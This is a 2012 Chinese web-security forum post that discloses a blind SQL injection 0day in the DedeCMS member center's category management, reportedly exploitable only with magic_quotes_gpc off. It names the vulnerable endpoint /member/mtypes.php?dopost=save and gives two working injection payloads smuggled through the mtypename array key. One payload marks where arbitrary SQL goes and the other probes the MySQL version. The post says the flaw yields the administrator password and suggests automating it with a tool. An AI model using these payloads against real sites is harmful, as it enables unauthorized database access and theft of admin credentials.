论坛
门户
内部优惠
喜欢
话题
VIP会员
搜索
新浪微博
登录
注册
100%
100%
首页
>
网络技术
>
网站安全
>
DedeCMS会员中心分类管理SQL注射0day漏洞
回复
« 返回列表
灯火互联
管理员
注册日期
2011-07-27
发帖数
41778
QQ
火币
41290枚
粉丝
1086
关注
100
加关注
写私信
打招呼
阅读:
1677
回复:
0
DedeCMS会员中心分类管理SQL注射0day漏洞
楼主
#
更多
只看楼主
倒序阅读
发布于:2012-12-20 13:44
保存
100%
100%
[]
1
可获得管理员密码
需要magic_quotes_gpc = Off,所以说是鸡肋啊.
发生在数组key里的注射
漏洞
,有点意思.
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
http://www.at
cpu
.com /de/member/mtypes.php?dopost=save
exploit:
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and'3'%3D'3]=c4rp3nt3r
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and'3'%3D'3]=c4rp3nt3r
喜欢
0
评分
0
最新喜欢:
淘宝天猫隐藏优惠券地址
回复
100%
发帖
回复
« 返回列表
普通帖
您需要登录后才可以回帖,
登录
或者
注册
100%
返回顶部
<div id="" class="core_pop_wrap" style="position:absolute;"> <div class="core_pop"> <div class="floot_like_pop"> <div class="pop_top"><a href="#" class="pop_close J_like_user_close">关闭</a>最新喜欢</div> <div class="pop_cont"> <ul class="cc J_like_user_list"></ul> </div> </div> </div> </div>
